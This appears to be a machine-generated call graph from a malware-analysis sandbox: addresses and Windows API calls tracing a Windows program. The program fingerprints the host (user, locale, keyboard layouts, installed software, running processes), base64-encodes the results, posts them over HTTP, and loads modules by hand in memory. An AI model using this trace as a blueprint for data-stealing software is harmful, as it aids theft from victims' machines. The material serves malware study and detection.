80202->80204 80205 405c93 80203->80205 80206 4056ff 80204->80206 80208 416e20 2 API calls 80205->80208 80211 405ccc codecvt 80205->80211 80207 416ea0 lstrcpy 80206->80207 80213 405708 80207->80213 80209 405caa 80208->80209 80210 416fb0 4 API calls 80209->80210 80212 405cc0 80210->80212 80215 416da0 lstrcpy 80211->80215 80214 416ea0 lstrcpy 80212->80214 80216 416fb0 4 API calls 80213->80216 80214->80211 80225 405cfc 80215->80225 80217 405732 80216->80217 80218 416ea0 lstrcpy 80217->80218 80219 40573b 80218->80219 80220 416fb0 4 API calls 80219->80220 80221 40575a 80220->80221 80222 416ea0 lstrcpy 80221->80222 80223 405763 80222->80223 80224 416f20 3 API calls 80223->80224 80226 405781 80224->80226 80225->79214 80227 416ea0 lstrcpy 80226->80227 80228 40578a 80227->80228 80229 416fb0 4 API calls 80228->80229 80230 4057a9 80229->80230 80231 416ea0 lstrcpy 80230->80231 80232 4057b2 80231->80232 80233 416fb0 4 API calls 80232->80233 80234 4057d1 80233->80234 80235 416ea0 lstrcpy 80234->80235 80236 4057da 80235->80236 80237 416fb0 4 API calls 80236->80237 80238 405806 80237->80238 80239 416f20 3 API calls 80238->80239 80240 40580d 80239->80240 80241 416ea0 lstrcpy 80240->80241 80242 405816 80241->80242 80243 40582c InternetConnectA 80242->80243 80243->80199 80244 40585c HttpOpenRequestA 80243->80244 80246 405c63 InternetCloseHandle 80244->80246 80247 4058bb 80244->80247 80246->80199 80248 416fb0 4 API calls 80247->80248 80249 4058cf 80248->80249 80250 416ea0 lstrcpy 80249->80250 80251 4058d8 80250->80251 80252 416f20 3 API calls 80251->80252 80253 4058f6 80252->80253 80254 416ea0 lstrcpy 80253->80254 80255 4058ff 80254->80255 80256 416fb0 4 API calls 80255->80256 80257 40591e 80256->80257 80258 416ea0 lstrcpy 80257->80258 80259 405927 80258->80259 80260 416fb0 4 API calls 80259->80260 80261 405948 80260->80261 80262 416ea0 lstrcpy 80261->80262 80263 405951 80262->80263 80264 416fb0 4 API calls 80263->80264 80265 405971 80264->80265 80266 416ea0 lstrcpy 80265->80266 80267 40597a 80266->80267 80268 416fb0 4 API calls 80267->80268 80269 405999 80268->80269 80270 416ea0 lstrcpy 80269->80270 80271 4059a2 80270->80271 80272 416f20 3 API calls 80271->80272 80273 4059c0 80272->80273 80274 416ea0 lstrcpy 80273->80274 80275 4059c9 80274->80275 80276 416fb0 4 API calls 80275->80276 80277 4059e8 80276->80277 80278 416ea0 lstrcpy 80277->80278 80279 4059f1 80278->80279 80280 416fb0 4 API calls 80279->80280 80281 405a10 80280->80281 80282 416ea0 lstrcpy 80281->80282 80283 405a19 80282->80283 80284 416f20 3 API calls 80283->80284 80285 405a37 80284->80285 80286 416ea0 lstrcpy 80285->80286 80287 405a40 80286->80287 80288 416fb0 4 API calls 80287->80288 80289 405a5f 80288->80289 80290 416ea0 lstrcpy 80289->80290 80291 405a68 80290->80291 80292 416fb0 4 API calls 80291->80292 80293 405a89 80292->80293 80294 416ea0 lstrcpy 80293->80294 80295 405a92 80294->80295 80296 416fb0 4 API calls 80295->80296 80297 405ab2 80296->80297 80298 416ea0 lstrcpy 80297->80298 80299 405abb 80298->80299 80300 416fb0 4 API calls 80299->80300 80301 405ada 80300->80301 80302 416ea0 lstrcpy 80301->80302 80303 405ae3 80302->80303 80304 416f20 3 API calls 80303->80304 80305 405b01 80304->80305 80306 416ea0 lstrcpy 80305->80306 80307 405b0a 80306->80307 80308 405b1d lstrlen 80307->80308 80863 4170d0 80308->80863 80310 405b2e lstrlen GetProcessHeap HeapAlloc 80864 4170d0 80310->80864 80312 405b5b lstrlen 80865 4170d0 80312->80865 80314 405b6b memcpy 80866 4170d0 80314->80866 80316 405b84 lstrlen 80317 405b94 80316->80317 80318 405b9d lstrlen memcpy 80317->80318 80867 4170d0 80318->80867 80320 405bc7 lstrlen 80868 4170d0 80320->80868 80322 405bd7 HttpSendRequestA 80323 405be2 InternetReadFile 80322->80323 80324 405c17 InternetCloseHandle 80323->80324 80328 405c0e 80323->80328 80324->80246 80326 416fb0 4 API calls 80326->80328 80327 416ea0 lstrcpy 80327->80328 80328->80323 80328->80324 80328->80326 80328->80327 80869 4170d0 80329->80869 80331 40f3d7 strtok_s 80333 40f3e4 80331->80333 80332 40f4b1 80332->79216 80333->80332 80334 40f48d strtok_s 80333->80334 80335 416e20 lstrlen lstrcpy 80333->80335 80334->80333 80335->80333 80870 4170d0 80336->80870 80338 40f227 strtok_s 80344 40f234 80338->80344 80339 40f387 80339->79224 80340 40f363 strtok_s 80340->80344 80341 40f314 StrCmpCA 80341->80344 80342 40f297 StrCmpCA 80342->80344 80343 40f2d7 StrCmpCA 80343->80344 80344->80339 80344->80340 80344->80341 80344->80342 80344->80343 80345 416e20 lstrlen lstrcpy 80344->80345 80345->80344 80347 416d40 lstrcpy 80346->80347 80348 40fd26 80347->80348 80349 416fb0 4 API calls 80348->80349 80350 40fd37 80349->80350 80351 416ea0 lstrcpy 80350->80351 80352 40fd40 80351->80352 80353 416fb0 4 API calls 80352->80353 80354 40fd5b 80353->80354 80355 416ea0 lstrcpy 80354->80355 80356 40fd64 80355->80356 80357 416fb0 4 API calls 80356->80357 80358 40fd7d 80357->80358 80359 416ea0 lstrcpy 80358->80359 80360 40fd86 80359->80360 80361 416fb0 4 API calls 80360->80361 80362 40fda1 80361->80362 80363 416ea0 lstrcpy 80362->80363 80364 40fdaa 80363->80364 80365 416fb0 4 API calls 80364->80365 80366 40fdc3 80365->80366 80367 416ea0 lstrcpy 80366->80367 80368 40fdcc 80367->80368 80369 416fb0 4 API calls 80368->80369 80370 40fde7 80369->80370 80371 416ea0 lstrcpy 80370->80371 80372 40fdf0 80371->80372 80373 416fb0 4 API calls 80372->80373 80374 40fe09 80373->80374 80375 416ea0 lstrcpy 80374->80375 80376 40fe12 80375->80376 80377 416fb0 4 API calls 80376->80377 80378 40fe2d 80377->80378 80379 416ea0 lstrcpy 80378->80379 80380 40fe36 80379->80380 80381 416fb0 4 API calls 80380->80381 80382 40fe4f 80381->80382 80383 416ea0 lstrcpy 80382->80383 80384 40fe58 80383->80384 80385 416fb0 4 API calls 80384->80385 80386 40fe76 80385->80386 80387 416ea0 lstrcpy 80386->80387 80388 40fe7f 80387->80388 80389 4141c0 6 API calls 80388->80389 80390 40fe96 80389->80390 80391 416f20 3 API calls 80390->80391 80392 40fea9 80391->80392 80393 416ea0 lstrcpy 80392->80393 80394 40feb2 80393->80394 80395 416fb0 4 API calls 80394->80395 80396 40fedc 80395->80396 80397 416ea0 lstrcpy 80396->80397 80398 40fee5 80397->80398 80399 416fb0 4 API calls 80398->80399 80400 40ff05 80399->80400 80401 416ea0 lstrcpy 80400->80401 80402 40ff0e 80401->80402 80871 414300 GetProcessHeap HeapAlloc RegOpenKeyExA 80402->80871 80404 40ff1e 80405 416fb0 4 API calls 80404->80405 80406 40ff2e 80405->80406 80407 416ea0 lstrcpy 80406->80407 80408 40ff37 80407->80408 80409 416fb0 4 API calls 80408->80409 80410 40ff56 80409->80410 80411 416ea0 lstrcpy 80410->80411 80412 40ff5f 80411->80412 80413 416fb0 4 API calls 80412->80413 80414 40ff80 80413->80414 80415 416ea0 lstrcpy 80414->80415 80416 40ff89 80415->80416 80874 414380 GetCurrentProcess IsWow64Process 80416->80874 80419 416fb0 4 API calls 80420 40ffa9 80419->80420 80421 416ea0 lstrcpy 80420->80421 80422 40ffb2 80421->80422 80423 416fb0 4 API calls 80422->80423 80424 40ffd1 80423->80424 80425 416ea0 lstrcpy 80424->80425 80426 40ffda 80425->80426 80427 416fb0 4 API calls 80426->80427 80428 40fffb 80427->80428 80429 416ea0 lstrcpy 80428->80429 80430 410004 80429->80430 80876 4143c0 GetProcessHeap HeapAlloc GetUserNameA 80430->80876 80432 410014 80433 416fb0 4 API calls 80432->80433 80434 410024 80433->80434 80435 416ea0 lstrcpy 80434->80435 80436 41002d 80435->80436 80437 416fb0 4 API calls 80436->80437 80438 41004c 80437->80438 80439 416ea0 lstrcpy 80438->80439 80440 410055 80439->80440 80441 416fb0 4 API calls 80440->80441 80442 410075 80441->80442 80443 416ea0 lstrcpy 80442->80443 80444 41007e 80443->80444 80445 414400 3 API calls 80444->80445 80446 41008e 80445->80446 80447 416fb0 4 API calls 80446->80447 80448 41009e 80447->80448 80449 416ea0 lstrcpy 80448->80449 80450 4100a7 80449->80450 80451 416fb0 4 API calls 80450->80451 80452 4100c6 80451->80452 80453 416ea0 lstrcpy 80452->80453 80454 4100cf 80453->80454 80455 416fb0 4 API calls 80454->80455 80456 4100f0 80455->80456 80457 416ea0 lstrcpy 80456->80457 80458 4100f9 80457->80458 80877 414450 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 80458->80877 80460 410109 80461 416fb0 4 API calls 80460->80461 80462 410119 80461->80462 80463 416ea0 lstrcpy 80462->80463 80464 410122 80463->80464 80465 416fb0 4 API calls 80464->80465 80466 410141 80465->80466 80467 416ea0 lstrcpy 80466->80467 80468 41014a 80467->80468 80469 416fb0 4 API calls 80468->80469 80470 41016b 80469->80470 80471 416ea0 lstrcpy 80470->80471 80472 410174 80471->80472 80878 4144b0 GetProcessHeap HeapAlloc GetTimeZoneInformation 80472->80878 80475 416fb0 4 API calls 80476 410194 80475->80476 80477 416ea0 lstrcpy 80476->80477 80478 41019d 80477->80478 80479 416fb0 4 API calls 80478->80479 80480 4101bc 80479->80480 80481 416ea0 lstrcpy 80480->80481 80482 4101c5 80481->80482 80483 416fb0 4 API calls 80482->80483 80484 4101e5 80483->80484 80485 416ea0 lstrcpy 80484->80485 80486 4101ee 80485->80486 80881 414530 GetUserDefaultLocaleName 80486->80881 80489 416fb0 4 API calls 80490 41020e 80489->80490 80491 416ea0 lstrcpy 80490->80491 80492 410217 80491->80492 80493 416fb0 4 API calls 80492->80493 80494 410236 80493->80494 80495 416ea0 lstrcpy 80494->80495 80496 41023f 80495->80496 80497 416fb0 4 API calls 80496->80497 80498 410260 80497->80498 80499 416ea0 lstrcpy 80498->80499 80500 410269 80499->80500 80886 414570 80500->80886 80502 410280 80503 416f20 3 API calls 80502->80503 80504 410293 80503->80504 80505 416ea0 lstrcpy 80504->80505 80506 41029c 80505->80506 80507 416fb0 4 API calls 80506->80507 80508 4102c6 80507->80508 80509 416ea0 lstrcpy 80508->80509 80510 4102cf 80509->80510 80511 416fb0 4 API calls 80510->80511 80512 4102ef 80511->80512 80513 416ea0 lstrcpy 80512->80513 80514 4102f8 80513->80514 80898 414710 GetSystemPowerStatus 80514->80898 80517 416fb0 4 API calls 80518 410318 80517->80518 80519 416ea0 lstrcpy 80518->80519 80520 410321 80519->80520 80521 416fb0 4 API calls 80520->80521 80522 410340 80521->80522 80523 416ea0 lstrcpy 80522->80523 80524 410349 80523->80524 80525 416fb0 4 API calls 80524->80525 80526 41036a 80525->80526 80527 416ea0 lstrcpy 80526->80527 80528 410373 80527->80528 80529 41037e GetCurrentProcessId 80528->80529 80900 415b70 OpenProcess 80529->80900 80532 416f20 3 API calls 80533 4103a4 80532->80533 80534 416ea0 lstrcpy 80533->80534 80535 4103ad 80534->80535 80536 416fb0 4 API calls 80535->80536 80537 4103d7 80536->80537 80538 416ea0 lstrcpy 80537->80538 80539 4103e0 80538->80539 80540 416fb0 4 API calls 80539->80540 80541 410400 80540->80541 80542 416ea0 lstrcpy 80541->80542 80543 410409 80542->80543 80905 414740 GetProcessHeap HeapAlloc RegOpenKeyExA 80543->80905 80545 410419 80546 416fb0 4 API calls 80545->80546 80547 410429 80546->80547 80548 416ea0 lstrcpy 80547->80548 80549 410432 80548->80549 80550 416fb0 4 API calls 80549->80550 80551 410451 80550->80551 80552 416ea0 lstrcpy 80551->80552 80553 41045a 80552->80553 80554 416fb0 4 API calls 80553->80554 80555 41047b 80554->80555 80556 416ea0 lstrcpy 80555->80556 80557 410484 80556->80557 80908 414800 80557->80908 80560 416fb0 4 API calls 80561 4104a4 80560->80561 80562 416ea0 lstrcpy 80561->80562 80563 4104ad 80562->80563 80564 416fb0 4 API calls 80563->80564 80565 4104cc 80564->80565 80566 416ea0 lstrcpy 80565->80566 80567 4104d5 80566->80567 80568 416fb0 4 API calls 80567->80568 80569 4104f6 80568->80569 80570 416ea0 lstrcpy 80569->80570 80571 4104ff 80570->80571 80923 4147c0 GetSystemInfo wsprintfA 80571->80923 80573 41050f 80574 416fb0 4 API calls 80573->80574 80575 41051f 80574->80575 80576 416ea0 lstrcpy 80575->80576 80577 410528 80576->80577 80578 416fb0 4 API calls 80577->80578 80579 410547 80578->80579 80580 416ea0 lstrcpy 80579->80580 80581 410550 80580->80581 80582 416fb0 4 API calls 80581->80582 80583 410570 80582->80583 80584 416ea0 lstrcpy 80583->80584 80585 410579 80584->80585 80924 414960 GetProcessHeap HeapAlloc 80585->80924 80587 410589 80588 416fb0 4 API calls 80587->80588 80589 410599 80588->80589 80590 416ea0 lstrcpy 80589->80590 80591 4105a2 80590->80591 80592 416fb0 4 API calls 80591->80592 80593 4105c1 80592->80593 80594 416ea0 lstrcpy 80593->80594 80595 4105ca 80594->80595 80596 416fb0 4 API calls 80595->80596 80597 4105eb 80596->80597 80598 416ea0 lstrcpy 80597->80598 80599 4105f4 80598->80599 80929 414ed0 80599->80929 80602 416f20 3 API calls 80603 41061e 80602->80603 80604 416ea0 lstrcpy 80603->80604 80605 410627 80604->80605 80606 416fb0 4 API calls 80605->80606 80607 410651 80606->80607 80608 416ea0 lstrcpy 80607->80608 80609 41065a 80608->80609 80610 416fb0 4 API calls 80609->80610 80611 41067a 80610->80611 80612 416ea0 lstrcpy 80611->80612 80613 410683 80612->80613 80614 416fb0 4 API calls 80613->80614 80615 4106a2 80614->80615 80616 416ea0 lstrcpy 80615->80616 80617 4106ab 80616->80617 80934 414a00 80617->80934 80619 4106c2 80620 416f20 3 API calls 80619->80620 80621 4106d5 80620->80621 80622 416ea0 lstrcpy 80621->80622 80623 4106de 80622->80623 80624 416fb0 4 API calls 80623->80624 80625 41070a 80624->80625 80626 416ea0 lstrcpy 80625->80626 80627 410713 80626->80627 80628 416fb0 4 API calls 80627->80628 80629 410732 80628->80629 80630 416ea0 lstrcpy 80629->80630 80631 41073b 80630->80631 80632 416fb0 4 API calls 80631->80632 80633 41075c 80632->80633 80634 416ea0 lstrcpy 80633->80634 80635 410765 80634->80635 80636 416fb0 4 API calls 80635->80636 80637 410784 80636->80637 80638 416ea0 lstrcpy 80637->80638 80639 41078d 80638->80639 80640 416fb0 4 API calls 80639->80640 80641 4107ae 80640->80641 80642 416ea0 lstrcpy 80641->80642 80643 4107b7 80642->80643 80942 414ae0 80643->80942 80645 4107d3 80646 416f20 3 API calls 80645->80646 80647 4107e6 80646->80647 80648 416ea0 lstrcpy 80647->80648 80649 4107ef 80648->80649 80650 416fb0 4 API calls 80649->80650 80651 410819 80650->80651 80652 416ea0 lstrcpy 80651->80652 80653 410822 80652->80653 80654 416fb0 4 API calls 80653->80654 80655 410843 80654->80655 80656 416ea0 lstrcpy 80655->80656 80657 41084c 80656->80657 80658 414ae0 17 API calls 80657->80658 80659 410868 80658->80659 80660 416f20 3 API calls 80659->80660 80661 41087b 80660->80661 80662 416ea0 lstrcpy 80661->80662 80663 410884 80662->80663 80664 416fb0 4 API calls 80663->80664 80665 4108ae 80664->80665 80666 416ea0 lstrcpy 80665->80666 80667 4108b7 80666->80667 80668 416fb0 4 API calls 80667->80668 80669 4108d6 80668->80669 80670 416ea0 lstrcpy 80669->80670 80671 4108df 80670->80671 80672 416fb0 4 API calls 80671->80672 80673 410900 80672->80673 80674 416ea0 lstrcpy 80673->80674 80675 410909 80674->80675 80978 414de0 80675->80978 80677 410920 80678 416f20 3 API calls 80677->80678 80679 410933 80678->80679 80680 416ea0 lstrcpy 80679->80680 80681 41093c 80680->80681 80682 41095a lstrlen 80681->80682 80683 41096a 80682->80683 80684 416d40 lstrcpy 80683->80684 80685 41097c 80684->80685 80686 401500 lstrcpy 80685->80686 80687 41098a 80686->80687 80988 404dc0 80687->80988 80689 410996 80689->79228 81169 4170d0 80690->81169 80692 404cc9 InternetOpenUrlA 80696 404ce1 80692->80696 80693 404cea InternetReadFile 80693->80696 80694 404d5c InternetCloseHandle InternetCloseHandle 80695 404da8 80694->80695 80695->79232 80696->80693 80696->80694 81170 4092b0 80697->81170 80699 40ef93 80700 40efb4 80699->80700 80701 40f1cf 80699->80701 80703 40efcd StrCmpCA 80700->80703 80702 401500 lstrcpy 80701->80702 80704 40f1dd 80702->80704 80705 40f04f 80703->80705 80706 40efd8 80703->80706 81334 40ea90 80704->81334 80710 40f06e StrCmpCA 80705->80710 80709 416da0 lstrcpy 80706->80709 80711 40eff0 80709->80711 80712 40f07d 80710->80712 80749 40f14e 80710->80749 80713 401500 lstrcpy 80711->80713 80714 416d40 lstrcpy 80712->80714 80715 40f01e 80713->80715 80717 40f08a 80714->80717 80718 416da0 lstrcpy 80715->80718 80716 40f17d StrCmpCA 80719 40f188 80716->80719 80720 40f1c7 80716->80720 80721 416fb0 4 API calls 80717->80721 80722 40f032 80718->80722 80723 401500 lstrcpy 80719->80723 80720->79236 80724 40f0b2 80721->80724 80725 416da0 lstrcpy 80722->80725 80726 40f196 80723->80726 80727 416f20 3 API calls 80724->80727 80728 40f04a 80725->80728 80729 416da0 lstrcpy 80726->80729 80730 40f0b9 80727->80730 81173 40e420 80728->81173 80732 40f1aa 80729->80732 80733 416fb0 4 API calls 80730->80733 80734 416da0 lstrcpy 80732->80734 80749->80716 80827 404486 80826->80827 80858 414ff0 malloc 80827->80858 80829 4044af 80859 414ff0 malloc 80829->80859 80831 4044c5 80860 414ff0 malloc 80831->80860 80833 4044db 80834 4044f5 lstrlen 80833->80834 80861 4170d0 80834->80861 80836 404505 InternetCrackUrlA 80837 404524 80836->80837 80837->80015 80839 416d40 lstrcpy 80838->80839 80840 415274 80839->80840 80841 416d40 lstrcpy 80840->80841 80842 415282 GetSystemTime 80841->80842 80843 415299 80842->80843 80844 416da0 lstrcpy 80843->80844 80845 4152fc 80844->80845 80845->80030 80847 416f31 80846->80847 80848 416f88 80847->80848 80850 416f68 lstrcpy lstrcat 80847->80850 80849 416da0 lstrcpy 80848->80849 80851 416f94 80849->80851 80850->80848 80851->80033 80852->80148 80854 4094d9 LocalAlloc 80853->80854 80855 404bae 80853->80855 80854->80855 80856 4094f4 CryptStringToBinaryA 80854->80856 80855->80036 80855->80038 80856->80855 80857 409519 LocalFree 80856->80857 80857->80855 80858->80829 80859->80831 80860->80833 80861->80836 80862->80158 80863->80310 80864->80312 80865->80314 80866->80316 80867->80320 80868->80322 80869->80331 80870->80338 80872 414362 RegCloseKey 80871->80872 80873 414345 RegQueryValueExA 80871->80873 80872->80404 80873->80872 80875 40ff99 80874->80875 80875->80419 80876->80432 80877->80460 80879 4144f7 wsprintfA 80878->80879 80880 410184 80878->80880 80879->80880 80880->80475 80882 41455a 80881->80882 80883 4101fe 80881->80883 81150 415420 LocalAlloc CharToOemW 80882->81150 80883->80489 80885 414566 80885->80883 80887 416d40 lstrcpy 80886->80887 80888 414589 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 80887->80888 80891 4145e2 80888->80891 80889 414603 GetLocaleInfoA 80889->80891 80890 4146d5 80892 4146e5 80890->80892 80893 4146db LocalFree 80890->80893 80891->80889 80891->80890 80896 416ea0 lstrcpy 80891->80896 80897 416fb0 lstrcpy lstrlen lstrcpy lstrcat 80891->80897 80894 416da0 lstrcpy 80892->80894 80893->80892 80895 4146f4 80894->80895 80895->80502 80896->80891 80897->80891 80899 410308 80898->80899 80899->80517 80901 415b93 K32GetModuleFileNameExA CloseHandle 80900->80901 80902 415bb5 80900->80902 80901->80902 80903 416d40 lstrcpy 80902->80903 80904 410391 80903->80904 80904->80532 80906 4147a2 RegCloseKey 80905->80906 80907 414785 RegQueryValueExA 80905->80907 80906->80545 80907->80906 80909 414836 GetLogicalProcessorInformationEx 80908->80909 80910 414855 GetLastError 80909->80910 80913 4148ab 80909->80913 80911 414860 80910->80911 80912 41489f 80910->80912 80922 414869 80911->80922 80916 410494 80912->80916 81154 4150f0 GetProcessHeap HeapFree 80912->81154 81153 4150f0 GetProcessHeap HeapFree 80913->81153 80916->80560 80919 4148fd 80919->80916 80921 414906 wsprintfA 80919->80921 80920 414893 80920->80916 80921->80916 80922->80909 80922->80920 81151 4150f0 GetProcessHeap HeapFree 80922->81151 81152 415110 GetProcessHeap HeapAlloc 80922->81152 80923->80573 80925 415090 80924->80925 80926 41498a GlobalMemoryStatusEx 80925->80926 80927 4149a0 __aulldiv 80926->80927 80928 4149d8 wsprintfA 80927->80928 80928->80587 80930 414ee8 GetProcessHeap HeapAlloc wsprintfA 80929->80930 80932 416d40 lstrcpy 80930->80932 80933 41060b 80932->80933 80933->80602 80935 416d40 lstrcpy 80934->80935 80940 414a16 80935->80940 80936 414a50 80938 416da0 lstrcpy 80936->80938 80937 416fb0 lstrcpy lstrlen lstrcpy lstrcat 80937->80940 80939 414ac9 80938->80939 80939->80619 80940->80936 80940->80937 80941 416ea0 lstrcpy 80940->80941 80941->80940 80943 416d40 lstrcpy 80942->80943 80944 414af9 RegOpenKeyExA 80943->80944 80945 414b4b 80944->80945 80946 414b6d 80944->80946 80947 416da0 lstrcpy 80945->80947 80948 414db0 RegCloseKey 80946->80948 80949 414b95 RegEnumKeyExA 80946->80949 80951 414b5a 80947->80951 80950 416da0 lstrcpy 80948->80950 80952 414dab 80949->80952 80953 414bdc wsprintfA RegOpenKeyExA 80949->80953 80950->80951 80951->80645 80952->80948 80954 414c22 RegCloseKey RegCloseKey 80953->80954 80955 414c5e RegQueryValueExA 80953->80955 80956 416da0 lstrcpy 80954->80956 80957 414c97 lstrlen 80955->80957 80958 414d9e RegCloseKey 80955->80958 80956->80951 80957->80958 80959 414cad 80957->80959 80958->80952 80960 416fb0 4 API calls 80959->80960 80961 414cc4 80960->80961 80962 416ea0 lstrcpy 80961->80962 80963 414cd0 80962->80963 80964 416fb0 4 API calls 80963->80964 80965 414cf4 80964->80965 80966 416ea0 lstrcpy 80965->80966 80967 414d00 80966->80967 80968 414d0b RegQueryValueExA 80967->80968 80968->80958 80969 414d40 80968->80969 80970 416fb0 4 API calls 80969->80970 80971 414d57 80970->80971 80972 416ea0 lstrcpy 80971->80972 80973 414d63 80972->80973 80974 416fb0 4 API calls 80973->80974 80975 414d87 80974->80975 80976 416ea0 lstrcpy 80975->80976 80977 414d93 80976->80977 80977->80958 80979 416d40 lstrcpy 80978->80979 80980 414df9 CreateToolhelp32Snapshot Process32First 80979->80980 80981 414e25 Process32Next 80980->80981 80982 414e9a FindCloseChangeNotification 80980->80982 80981->80982 80987 414e3a 80981->80987 80983 416da0 lstrcpy 80982->80983 80985 414eb3 80983->80985 80984 416fb0 lstrcpy lstrlen lstrcpy lstrcat 80984->80987 80985->80677 80986 416ea0 lstrcpy 80986->80987 80987->80981 80987->80984 80987->80986 80989 416da0 lstrcpy 80988->80989 80990 404dd9 80989->80990 80991 404470 3 API calls 80990->80991 80992 404de5 80991->80992 81155 4155a0 80992->81155 80994 404e3e 80995 404e49 lstrlen 80994->80995 80996 404e59 80995->80996 80997 4155a0 4 API calls 80996->80997 80998 404e6a 80997->80998 80999 416d40 lstrcpy 80998->80999 81000 404e7d 80999->81000 81001 416d40 lstrcpy 81000->81001 81002 404e8a 81001->81002 81003 416d40 lstrcpy 81002->81003 81004 404e97 81003->81004 81005 416d40 lstrcpy 81004->81005 81006 404ea4 81005->81006 81007 416d40 lstrcpy 81006->81007 81008 404eb1 InternetOpenA StrCmpCA 81007->81008 81009 404ee3 81008->81009 81010 405578 InternetCloseHandle 81009->81010 81011 415260 3 API calls 81009->81011 81017 40558d codecvt 81010->81017 81012 404f02 81011->81012 81013 416f20 3 API calls 81012->81013 81014 404f15 81013->81014 81015 416ea0 lstrcpy 81014->81015 81016 404f1e 81015->81016 81018 416fb0 4 API calls 81016->81018 81020 416da0 lstrcpy 81017->81020 81019 404f5f 81018->81019 81021 416f20 3 API calls 81019->81021 81028 4055c7 81020->81028 81022 404f66 81021->81022 81023 416fb0 4 API calls 81022->81023 81024 404f6d 81023->81024 81025 416ea0 lstrcpy 81024->81025 81026 404f76 81025->81026 81027 416fb0 4 API calls 81026->81027 81029 404fb7 81027->81029 81028->80689 81030 416f20 3 API calls 81029->81030 81031 404fbe 81030->81031 81032 416ea0 lstrcpy 81031->81032 81033 404fc7 81032->81033 81034 404fdd InternetConnectA 81033->81034 81034->81010 81035 40500d HttpOpenRequestA 81034->81035 81037 40556b InternetCloseHandle 81035->81037 81038 40506b 81035->81038 81037->81010 81039 416fb0 4 API calls 81038->81039 81040 40507f 81039->81040 81041 416ea0 lstrcpy 81040->81041 81042 405088 81041->81042 81043 416f20 3 API calls 81042->81043 81044 4050a6 81043->81044 81045 416ea0 lstrcpy 81044->81045 81046 4050af 81045->81046 81047 416fb0 4 API calls 81046->81047 81048 4050ce 81047->81048 81049 416ea0 lstrcpy 81048->81049 81050 4050d7 81049->81050 81051 416fb0 4 API calls 81050->81051 81052 4050f8 81051->81052 81053 416ea0 lstrcpy 81052->81053 81054 405101 81053->81054 81150->80885 81151->80922 81152->80922 81153->80919 81154->80916 81156 4155ad CryptBinaryToStringA 81155->81156 81157 4155a9 81155->81157 81156->81157 81158 4155ce GetProcessHeap HeapAlloc 81156->81158 81157->80994 81159 4155f0 81158->81159 81160 4155f4 codecvt 81158->81160 81159->81157 81161 415605 CryptBinaryToStringA 81160->81161 81161->81159 81169->80692 81409 409260 81170->81409 81172 4092c1 81172->80699 81335 416d40 lstrcpy 81334->81335 81336 40eaa6 81335->81336 81337 4154e0 2 API calls 81336->81337 81338 40eabb 81337->81338 81339 416f20 3 API calls 81338->81339 81340 40eacb 81339->81340 81341 416ea0 lstrcpy 81340->81341 81342 40ead4 81341->81342 81414 414ff0 malloc 81409->81414 81411 40926d 81415 406990 81411->81415 81413 40928c codecvt 81413->81172 81414->81411 81418 406730 81415->81418 81419 406753 81418->81419 81430 406749 81418->81430 81436 405f20 81419->81436 81423 4067ae 81423->81430 81448 4063a0 81423->81448 81427 40683a 81428 4068d6 VirtualFree 81427->81428 81429 4068e7 81427->81429 81427->81430 81428->81429 81431 406931 81429->81431 81433 406916 FreeLibrary 81429->81433 81434 406928 81429->81434 81430->81413 81431->81430 81433->81429 81438 405f32 81436->81438 81437 405f39 81437->81430 81442 406050 81437->81442 81438->81437 81439 405fbe 81438->81439 81465 415110 GetProcessHeap HeapAlloc 81439->81465 81441 405fe0 81441->81437 81447 40607f VirtualAlloc 81442->81447 81444 406120 81445 40612c 81444->81445 81446 406133 VirtualAlloc 81444->81446 81445->81423 81446->81445 81447->81444 81447->81445 81449 4063c5 81448->81449 81450 4063b9 81448->81450 81449->81430 81459 4065d0 81449->81459 81450->81449 81451 4063f9 LoadLibraryA 81450->81451 81452 406418 81451->81452 81453 406422 81451->81453 81452->81449 81456 4064cc 81453->81456 81466 415110 GetProcessHeap HeapAlloc 81453->81466 81455 406594 GetProcAddress 81455->81452 81455->81456 81456->81452 81456->81455 81457 40647b 81457->81452 81467 4150f0 GetProcessHeap HeapFree 81457->81467 81461 4065eb 81459->81461 81460 406699 81460->81427 81461->81460 81462 406670 VirtualProtect 81461->81462 81462->81460 81462->81461 81465->81441 81466->81457 81467->81456 82334 6a3db8ae 82335 6a3db8ba ___scrt_is_nonwritable_in_current_image 82334->82335 82336 6a3db8e3 dllmain_raw 82335->82336 82337 6a3db8c9 82335->82337 82338 6a3db8de 82335->82338 82336->82337 82339 6a3db8fd dllmain_crt_dispatch 82336->82339 82347 6a3bbed0 DisableThreadLibraryCalls LoadLibraryExW 82338->82347 82339->82337 82339->82338 82341 6a3db91e 82342 6a3db94a 82341->82342 82348 6a3bbed0 DisableThreadLibraryCalls LoadLibraryExW 82341->82348 82342->82337 82343 6a3db953 dllmain_crt_dispatch 82342->82343 82343->82337 82345 6a3db966 dllmain_raw 82343->82345 82345->82337 82346 6a3db936 dllmain_crt_dispatch dllmain_raw 82346->82342 82347->82341 82348->82346 82349 6a3db694 82350 6a3db6a0 ___scrt_is_nonwritable_in_current_image 82349->82350 82379 6a3daf2a 82350->82379 82352 6a3db6a7 82353 6a3db796 82352->82353 82354 6a3db6d1 82352->82354 82357 6a3db6ac ___scrt_is_nonwritable_in_current_image 82352->82357 82396 6a3db1f7 IsProcessorFeaturePresent 82353->82396 82383 6a3db064 82354->82383 82358 6a3db6e0 __RTC_Initialize 82358->82357 82386 6a3dbf89 InitializeSListHead 82358->82386 82359 6a3db7b3 ___scrt_uninitialize_crt __RTC_Initialize 82361 6a3db6ee ___scrt_initialize_default_local_stdio_options 82365 6a3db6f3 _initterm_e 82361->82365 82362 6a3db79d ___scrt_is_nonwritable_in_current_image 82362->82359 82363 6a3db828 82362->82363 82364 6a3db7d2 82362->82364 82366 6a3db1f7 ___scrt_fastfail 6 API calls 82363->82366 82400 6a3db09d _execute_onexit_table _cexit ___scrt_release_startup_lock 82364->82400 82365->82357 82368 6a3db708 82365->82368 82369 6a3db82f 82366->82369 82387 6a3db072 82368->82387 82374 6a3db86e dllmain_crt_process_detach 82369->82374 82375 6a3db83b 82369->82375 82370 6a3db7d7 82401 6a3dbf95 __std_type_info_destroy_list 82370->82401 82373 6a3db70d 82373->82357 82376 6a3db711 _initterm 82373->82376 82378 6a3db840 82374->82378 82377 6a3db860 dllmain_crt_process_attach 82375->82377 82375->82378 82376->82357 82377->82378 82380 6a3daf33 82379->82380 82402 6a3db341 IsProcessorFeaturePresent 82380->82402 82382 6a3daf3f ___scrt_uninitialize_crt 82382->82352 82403 6a3daf8b 82383->82403 82385 6a3db06b 82385->82358 82386->82361 82388 6a3db077 